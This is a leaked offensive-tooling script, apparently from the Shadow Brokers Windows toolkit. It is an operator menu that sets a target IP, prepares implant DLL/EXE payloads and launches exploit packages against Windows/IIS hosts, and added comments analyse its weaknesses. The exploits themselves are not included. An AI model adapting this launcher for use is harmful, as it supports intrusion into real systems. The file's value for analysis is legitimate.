shadowbrokers-exploits/windows/Resources/LegacyWindowsExploits/Scripts/_LegacyExploit.dss
2017-04-14 11:45:07 +02:00


@include "_Arrays.dsi";
@include "_LpHelperFunctions.dsi";
@include "_Menu.dsi";
@include "_Paths.dsi";
@echo off;
# Script entry point: builds the shared %params table, discovers the exploit
# directories on disk, asks the operator for a target address and then hands
# control to the interactive menu. The language is the framework's own
# scripting dialect; helper semantics noted below are inferred from how the
# helpers are called here unless stated otherwise.
#
# Working/log directory for this tool: the directory returned by
# _GetLpLogsDirectory with "/LegacyExploits/" appended. The FileMkdir result
# is not checked.
string $logDir;
_GetLpLogsDirectory($logDir);
StrCat($logDir, "/LegacyExploits/");
FileMkdir($logDir);
# Root directory: the resources directory with ".." appended, then normalized.
# NOTE(review): no path separator is added before ".."; presumably
# _GetLpResourcesDirectory returns a path with a trailing separator - confirm.
string $rootDir;
_GetLpResourcesDirectory($rootDir);
StrCat($rootDir, "..");
_NormalizePath($rootDir);
# Exploit packages are looked up in "../Exploits" relative to this script.
string $expDir = "%_sgEnv{'script_path'}/../Exploits";
_NormalizePath($expDir);
# Default parameters shared by every menu callback. No menu option defined
# below changes 'arch' or 'os', so they stay at i386 / winnt for the session.
string %params;
%params{'arch'} = "i386";
%params{'os'} = "winnt";
%params{'iis_root'} = "C:\\inetpub";
%params{'root_dir'} = $rootDir;
%params{'work_dir'} = $logDir;
%params{'full_exploit_dir'} = $expDir;
# 'lp_dll' is built from the arch/os values assigned just above.
%params{'lp_dll'} = "Resources/Pc/%params{'arch'}-%params{'os'}/PC_Exploit.dll";
%params{'project'} = "Legacy Exploit Station";
%params{'nopause'} = "true";
# "**NONE**" is the placeholder shown until the operator enters an EXE name.
%params{'payload_exe_name'} = "**NONE**";
# Fills %params{'exploits'} and %params{'exploit_names'}.
# NOTE(review): the return value is ignored, so a missing or unreadable
# Exploits directory is not reported here and only shows up later as an
# empty exploit list.
FindExploits(%params);
# A target IP is mandatory: the script exits if the operator declines to
# continue inside _ChangeTargetIp.
if (!_ChangeTargetIp(%params))
{
return false;
}
# Build the menu: one header callback plus three sections (Configuration,
# Payload, Actions). The last string argument of each _AddOption call is the
# name of the callback Sub defined further down in this file. Every handle
# (hmenu, hsConfig, hsPayload, hsActions) is stored in %params and checked
# with defined(); any failure aborts the whole script.
string %menu;
if (!_CreateMenu(%menu, %params{'project'}, %params{'hmenu'}) || !defined(%params{'hmenu'}) ||
!_SetHeader(%menu, %params{'hmenu'}, "ExploitHeader" ) ||
!_AddSection(%menu, %params{'hmenu'}, "Configuration", %params{'hsConfig'}) || !defined(%params{'hsConfig'}) ||
!_AddOption(%menu, %params{'hsConfig'}, "Change target IP", "ChangeTargetIp") ||
!_AddOption(%menu, %params{'hsConfig'}, "Change EXE name", "ChangeExeName") ||
!_AddOption(%menu, %params{'hsConfig'}, "Change IIS location", "ChangeIISLocation") ||
!_AddSection(%menu, %params{'hmenu'}, "Payload", %params{'hsPayload'}) || !defined(%params{'hsPayload'}) ||
!_AddOption(%menu, %params{'hsPayload'}, "Prepare a new DLL payload", "PrepDllPayload") ||
!_AddOption(%menu, %params{'hsPayload'}, "Prepare a new EXE payload", "PrepExePayload") ||
!_AddOption(%menu, %params{'hsPayload'}, "Pick an existing payload", "PickPayload") ||
!_AddSection(%menu, %params{'hmenu'}, "Actions", %params{'hsActions'}) || !defined(%params{'hsActions'}) ||
!_AddOption(%menu, %params{'hsActions'}, "Run an exploit", "PerformExploit"))
{
echo("*** Unable to create %params{'project'} menu ***", ERROR);
return false;
}
# Run the interactive menu; its result is the script's result.
return _ExecuteMenu(%menu, %params{'hmenu'}, %params);
#------------------------------------------------------------------------------
# Menu callback for "Change EXE name". Thin wrapper around _ChangeExeName.
#   %menu, $key : required by the callback signature, unused here.
#   %params     : shared parameter table; 'payload_exe_name' may be updated.
#   $cont       : always set to true (presumably tells the menu loop to keep
#                 running - confirm against _Menu.dsi).
# Returns whatever _ChangeExeName returns (always true in this file).
Sub ChangeExeName(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{
$cont = true;
return _ChangeExeName(%params);
} /* end ChangeExeName */
#------------------------------------------------------------------------------
# Menu callback for "Change target IP". Thin wrapper around _ChangeTargetIp.
#   %menu, $key : required by the callback signature, unused here.
#   %params     : shared parameter table; 'targetIP' may be updated.
#   $cont       : always set to true.
# Returns the result of _ChangeTargetIp, which is false when the operator
# answers "no" to one of its "continue?" prompts.
# NOTE(review): how the menu loop reacts to a false return combined with
# $cont == true is decided in _Menu.dsi, which is not visible here.
Sub ChangeTargetIp(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{
$cont = true;
return _ChangeTargetIp(%params);
} /* end ChangeTargetIp */
#------------------------------------------------------------------------------#
# Menu callback for "Change IIS location": prompts for a new IIS root path
# and stores it in %params{'iis_root'}.
#   %menu, $key : required by the callback signature, unused here.
#   $cont       : always set to true.
# Always returns true; a cancelled or empty prompt leaves the old value.
# NOTE(review): the entered string is stored without any validation or
# quoting. PerformExploit substitutes %params values verbatim into a command
# line, so whitespace or quote characters entered here would change how that
# command line is parsed.
Sub ChangeIISLocation(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{
$cont = true;
string $name;
# Third argument is the current value (presumably offered as the default).
if (!GetInput("Enter the new IIS location", $name, %params{'iis_root'}) || !defined($name))
{
return true;
}
%params{'iis_root'} = $name;
return true;
} /* end ChangeIISLocation */
#------------------------------------------------------------------------------#
# Menu header callback (registered through _SetHeader): prints the current
# session configuration - target IP, IIS root, LP DLL path and the selected
# DLL / EXE payloads.
#   %menu, $key : required by the callback signature, unused here.
#   $cont       : always set to true.
# Always returns true. Read-only with respect to %params.
sub ExploitHeader(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{
$cont = true;
echo "Current Configuration:";
echo(" Target IP : %params{'targetIP'}", DEFAULT);
echo(" IIS Root : %params{'iis_root'}", DEFAULT);
echo(" LP DLL : %params{'lp_dll'}", DEFAULT);
if (!defined(%params{'payload_dll'}))
{
echo(" DLL Payload : None", WARNING);
}
else
{
echo(" DLL Payload : %params{'payload_dll_description'}", DEFAULT);
# Show only the last two path components (parent directory / file name).
# The pattern accepts both "/" and "\" as separators.
# NOTE(review): the RegExMatch result is not checked; if the path has fewer
# than two separators $shortFile is presumably left undefined - confirm.
string $shortFile;
RegExMatch("^.*[/\\\\]+(.*)[/\\\\]+(.*)\$", %params{'payload_dll'}, $shortFile);
echo(" $shortFile[0]/$shortFile[1]", DEFAULT);
}
if (!defined(%params{'payload_exe'}))
{
echo(" EXE Payload : None", WARNING);
}
else
{
echo(" EXE Payload : %params{'payload_exe_description'}", DEFAULT);
# Same short-name extraction as for the DLL payload above.
string $shortFile;
RegExMatch("^.*[/\\\\]+(.*)[/\\\\]+(.*)\$", %params{'payload_exe'}, $shortFile);
echo(" $shortFile[0]/$shortFile[1]", DEFAULT);
echo(" EXE Name : %params{'payload_exe_name'}", DEFAULT);
}
return true;
} /* end ExploitHeader */
#------------------------------------------------------------------------------#
# Discovers the available exploit packages and records them in %params.
#
# Each sub-directory of %params{'full_exploit_dir'} is treated as one package:
#   - a directory for which FileCheck("<dir>/disabled") succeeds is skipped
#     (presumably a marker file named "disabled" - confirm FileCheck semantics);
#   - a directory whose exploit.cfg cannot be read is skipped silently;
#   - the display name is the 'name' key of exploit.cfg, falling back to
#     $parts[1] from SplitPath, or to the full path if SplitPath fails.
# Results go into two parallel lists, %params{'exploits'} (directory paths)
# and %params{'exploit_names'} (display names); PerformExploit relies on the
# two lists sharing indexes.
#
# For analysts: this on-disk layout (an "Exploits" directory whose children
# each hold an exploit.cfg and optionally a "disabled" marker) is what the
# script expects to find next to itself.
#
# Returns false only when the directory listing itself fails; true otherwise,
# including when no package was found.
sub FindExploits(REF string %params)
{
string $dirs;
if (!FileGetDirs(%params{'full_exploit_dir'}, "*", $dirs))
{
return false;
}
for (int $i=0; $i < sizeof($dirs); $i++)
{
if (FileCheck("$dirs[$i]/disabled"))
{
continue;
}
# NOTE(review): %config is declared inside the loop; whether it starts out
# empty on every iteration depends on the language's scoping rules - confirm,
# otherwise a 'name' from a previous package could leak into the next one.
string %config;
if (!_ReadExploitConfig($dirs[$i], %config))
{
continue;
}
if (!defined(%config{'name'}))
{
string $parts;
if (SplitPath($dirs[$i], $parts))
{
%config{'name'} = $parts[1];
}
else
{
%config{'name'} = $dirs[$i];
}
}
_AppendString(%params{'exploits'}, $dirs[$i]);
_AppendString(%params{'exploit_names'}, %config{'name'});
}
return true;
} /* end FindExploits */
#------------------------------------------------------------------------------#
# Menu callback for "Run an exploit": lets the operator choose one of the
# packages found by FindExploits, builds a perl command line from that
# package's exploit.cfg and runs it locally in the package directory.
#   %menu, $key : required by the callback signature, unused here.
#   %params     : shared parameter table; 'exploit_dir' is overwritten.
#   $cont       : always set to true.
# Always returns true, on success and on every failure path.
#
# Review notes (security-relevant):
#   - The command line is assembled purely by string concatenation. Both the
#     'command' and 'options' values come from exploit.cfg, and the substituted
#     %params values include free-form operator input (IIS root, EXE name).
#     Nothing is quoted or escaped before the string is placed inside the
#     double-quoted -command argument, so exploit.cfg has to be treated as
#     executable content when triaging a copy of this toolkit.
#   - $options is assigned but never used afterwards in this Sub.
#   - The failure branch after the run returns while echo is still on; only
#     the success path reaches the later "echo off" directive.
sub PerformExploit(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{
$cont = true;
# At least one payload (DLL or EXE) must have been selected first.
if (!defined(%params{'payload_dll'}) && !defined(%params{'payload_exe'}))
{
echo("* No payloads set", ERROR);
pause;
return true;
}
string $choice;
int $index;
# $index is the position in exploit_names; the same position is used below
# to look up the directory in the parallel 'exploits' list.
if (!_ExecuteSimpleMenu("Choose an exploit", %params{'exploit_names'}, $choice, $index) || !defined($choice))
{
return true;
}
if (!defined($index) || !defined(%params{'exploits'}[$index]))
{
echo("* Failed to find directory for $choice", ERROR);
pause;
return true;
}
# Re-read the package configuration at run time (FindExploits only kept the
# directory and the display name).
string %config;
if (!_ReadExploitConfig(%params{'exploits'}[$index], %config))
{
echo("* Failed to read exploit config", ERROR);
pause;
return true;
}
# Split the 'options' value on single whitespace characters; tokens that start
# with "$" are placeholders resolved against %params further down.
string $options = %config{'options'};
string $parts;
if (!RegExSplit("\\s", %config{'options'}, 0, $parts))
{
echo("* Failed to split up exploit options", ERROR);
pause;
return true;
}
# Relative exploit directory, stored with escaped double quotes around it
# (presumably because the value ends up inside the quoted -command string).
string $dirParts;
if (!SplitPath(%params{'exploits'}[$index], $dirParts))
{
echo("* Failed to split dir parts", ERROR);
pause;
return true;
}
%params{'exploit_dir'} = "\\\"Exploits\\$dirParts[1]\\\"";
# The interpreter is always perl; the script name comes from exploit.cfg.
string $cmdLine = "perl %config{'command'}";
for (int $i=0; $i < sizeof($parts); $i++)
{
string $varName;
# A token of the form $foo is replaced by the value of %params{'foo'}.
# NOTE(review): no check that the key exists; an unknown placeholder
# presumably expands to an empty or undefined string - confirm.
if (RegExMatch("^\\\$(.*)\$", $parts[$i], $varName))
{
$parts[$i] = "%params{$varName}";
}
StrCat($cmdLine, " $parts[$i]");
}
# Every command gets "-c <toolkit root> -v" appended. This local $rootDir is
# the parent of the Exploits directory.
string $rootDir = "%params{'full_exploit_dir'}/../";
_NormalizePath($rootDir);
StrCat($cmdLine, " -c $rootDir -v");
@echo on;
# Runs the assembled command on the operator side ("local run"), with output
# redirected and the package directory as working directory.
if (!`local run -command "$cmdLine" -redirect -directory "%params{'exploits'}[$index]"`)
{
echo("* Failed to run exploit", ERROR);
pause;
return true;
}
else
{
# Record the tool use under the display name with any trailing
# " (version ...)" suffix removed; the full choice string is passed as the
# second argument.
string $name;
if (!RegExMatch("^(.*)\\s+\\(version .*\\).*\$", $choice, $name))
{
$name = $choice;
}
_RecordToolUse("$name", $choice);
}
@echo off;
pause;
return true;
} /* end PerformExploit */
#------------------------------------------------------------------------------#
# Menu callback for "Pick an existing payload": runs the framework's pc_pick
# command for the configured arch/os and stores the chosen payload in %params.
#   %menu, $key : required by the callback signature, unused here.
#   $cont       : always set to true.
# Always returns true, including on failure (an error is echoed instead).
#
# The payload's bin type decides the slot: "sharedlib" fills payload_dll and
# payload_dll_description; anything else fills payload_exe and
# payload_exe_description and then prompts for the EXE name.
# NOTE(review): when pc_pick fails the Sub returns before the "record off"
# directive, so recording presumably stays enabled - confirm.
sub PickPayload(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{
$cont = true;
string $extraArgs = "-arch %params{'arch'} -os %params{'os'} -type Level3 -verbose";
# Recording is switched on so the command's result data can be read back
# with GetCmdData below (inferred from usage).
@record on;
if (!`pc_pick $extraArgs`)
{
echo("* Failed to pick payload", ERROR);
pause;
return true;
}
@record off;
string $file, $name, $binType;
# All three fields must be present and defined, otherwise nothing is stored.
if (!GetCmdData("Payload::Description", $name) || !defined($name) ||
!GetCmdData("Payload::File", $file) || !defined($file) ||
!GetCmdData("Payload::BinType", $binType) || !defined($binType))
{
echo("* Failed to get payload information", ERROR);
pause;
return true;
}
if ($binType == "sharedlib")
{
%params{'payload_dll_description'} = $name;
%params{'payload_dll'} = $file;
}
else
{
%params{'payload_exe_description'} = $name;
%params{'payload_exe'} = $file;
_ChangeExeName(%params);
}
return true;
} /* end PickPayload */
#------------------------------------------------------------------------------
# Menu callback for "Prepare a new DLL payload": sets the bin type to
# "sharedlib" and delegates to PrepPayload, passing the DLL description and
# file slots of %params as the output arguments.
#   %menu, $key : required by the callback signature, unused here.
#   $cont       : always set to true.
# Returns PrepPayload's result (always true in this file).
sub PrepDllPayload(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{
$cont = true;
%params{'loadBinType'} = "sharedlib";
return PrepPayload(%params, %params{'payload_dll_description'}, %params{'payload_dll'});
} /* end PrepDllPayload */
#------------------------------------------------------------------------------
# Menu callback for "Prepare a new EXE payload": sets the bin type to "exe"
# and delegates to PrepPayload, passing the EXE description and file slots of
# %params as the output arguments.
#   %menu, $key : required by the callback signature, unused here.
#   $cont       : always set to true.
# Returns PrepPayload's result (always true in this file).
sub PrepExePayload(REF string %menu, REF string %params, IN string $key, OUT bool $cont)
{
$cont = true;
%params{'loadBinType'} = "exe";
return PrepPayload(%params, %params{'payload_exe_description'}, %params{'payload_exe'});
} /* end PrepExePayload */
#------------------------------------------------------------------------------
# Shared worker for PrepDllPayload / PrepExePayload: runs the framework's
# pc_prep command with the configured arch, os and bin type, then returns the
# description and file of the payload that was just configured.
#   %params      : reads 'arch', 'os' and 'loadBinType'.
#   $payloadName : OUT, set to the payload description on success only.
#   $payloadFile : OUT, set to the payload file on success only.
# Always returns true; on failure an error is echoed and the OUT arguments
# are not assigned here.
# NOTE(review): unlike PickPayload the failure paths do not pause, and when
# pc_prep fails the Sub returns before the "record off" directive.
sub PrepPayload(REF string %params, OUT string $payloadName, OUT string $payloadFile)
{
string $extraArgs = "-arch %params{'arch'} -os %params{'os'} -type Level3";
StrCat($extraArgs, " -binType %params{'loadBinType'}");
@record on;
if (!`pc_prep $extraArgs`)
{
echo("* Failed to configure payload", ERROR);
return true;
}
@record off;
# The freshly configured payload becomes the selected one without asking.
string $file, $name;
if (!GetCmdData("Payload::Description", $name) || !defined($name) ||
!GetCmdData("Payload::File", $file) || !defined($file))
{
echo("* Failed to get payload information", ERROR);
return true;
}
$payloadName = $name;
$payloadFile = $file;
# EXE payloads additionally need a file name, so prompt for it right away.
if (%params{'loadBinType'} == "exe")
{
_ChangeExeName(%params);
}
return true;
} /* end PrepPayload */
#------------------------------------------------------------------------------
# Prompts for the EXE payload name and stores it in
# %params{'payload_exe_name'}. The current value is passed as the third
# GetInput argument (presumably shown as the default).
# Always returns true; a cancelled or undefined input keeps the old value.
# NOTE(review): the name is stored without validation or quoting, and
# PerformExploit may substitute it verbatim into a command line.
Sub _ChangeExeName(REF string %params)
{
string $name;
if (!GetInput("Enter the new EXE name", $name, %params{'payload_exe_name'}) || !defined($name))
{
return true;
}
%params{'payload_exe_name'} = $name;
return true;
} /* end _ChangeExeName */
#------------------------------------------------------------------------------
# Prompts until the operator enters a dotted-quad address, stores it in
# %params{'targetIP'} and optionally runs the framework's ping and traceroute
# commands against it.
# Returns true once an address is accepted and the operator chose to
# continue; returns false when the operator answers "no" to a "continue?"
# prompt. In that case 'targetIP' has already been overwritten.
#
# Review notes:
#   - The pattern only checks for four groups of one to three digits, so
#     out-of-range octets such as 999 are accepted. IPv6 and host names are
#     rejected.
#   - The dots are written with a single backslash inside a quoted string,
#     while other patterns in this file double their backslashes; whether the
#     regex engine sees a literal dot or "any character" depends on the
#     string-escape rules of the language - confirm.
#   - If GetInput fails there is no else branch, so the loop simply prompts
#     again; the Sub has no cancel path before a valid address is entered.
#   - Both optional probes use ICMP-style commands with a 15 second timeout
#     and are the only network activity this Sub starts.
Sub _ChangeTargetIp(REF string %params)
{
# get the target IP
while (true)
{
string $temp;
if (GetInput("Enter the target IP", $temp))
{
if (RegExMatch("^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\$", $temp))
{
# good ip
%params{'targetIP'} = $temp;
# Optional reachability check; echo is turned on so the command output is
# shown to the operator.
if (prompt("Do you want to ping the target?"))
{
@echo on;
`ping %params{'targetIP'} -timeout 15s`;
@echo off;
if (!prompt("Do you want to continue?"))
{
return false;
}
}
# Optional route check, limited to 30 hops.
if (prompt("Do you want to do a traceroute to the target?"))
{
@echo on;
`traceroute %params{'targetIP'} -icmp -maxhops 30 -timeout 15s`;
@echo off;
if (!prompt("Do you want to continue?"))
{
return false;
}
}
return true;
}
else
{
echo("The value must be of the form ###.###.###.###", ERROR);
}
}
}
# shouldn't get here
return false;
} /* end _ChangeTargetIp */
#------------------------------------------------------------------------------
# Reads "<dir>/exploit.cfg" and fills %config with its key=value pairs.
#   $dir    : package directory to read from.
#   %config : OUT, one entry per line that splits into exactly two parts.
# Returns false when the file cannot be read, true otherwise (even when no
# line produced an entry).
#
# Parsing is deliberately minimal:
#   - each line is split on "=" with a third argument of 2 (presumably a
#     maximum field count, so a value may itself contain "=" - confirm);
#   - lines that do not yield two parts are ignored without a message;
#   - keys and values are stored as-is: no trimming, no comment syntax and no
#     check against a list of known keys, and a repeated key overwrites the
#     earlier value.
# PerformExploit later turns the 'command' and 'options' values into a command
# line, so the content of this file controls what gets executed.
sub _ReadExploitConfig(IN string $dir, OUT string %config)
{
string $lines;
if (!ReadFile("$dir/exploit.cfg", $lines))
{
return false;
}
for (int $j=0; $j < sizeof($lines); $j++)
{
string $parts;
if (RegExSplit("=", $lines[$j], 2, $parts) && (sizeof($parts) == 2))
{
%config{$parts[0]} = $parts[1];
}
}
return true;
} /* end _ReadExploitConfig */